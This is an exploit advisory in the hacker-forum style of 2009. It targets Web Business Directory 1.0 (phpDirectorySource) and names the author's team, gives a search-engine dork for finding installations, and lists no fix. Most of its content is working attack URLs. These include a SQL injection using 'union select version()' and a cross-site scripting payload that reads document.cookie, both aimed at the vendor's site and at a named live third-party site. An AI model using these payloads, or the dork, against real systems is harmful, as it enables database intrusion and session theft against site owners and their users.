phpDirectorySource (XSS-SQL) Multiple Remote Vulnerabilities

2009-07-21 00:01:47

==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
==============================================================================

[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>


Author: Moudi

###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.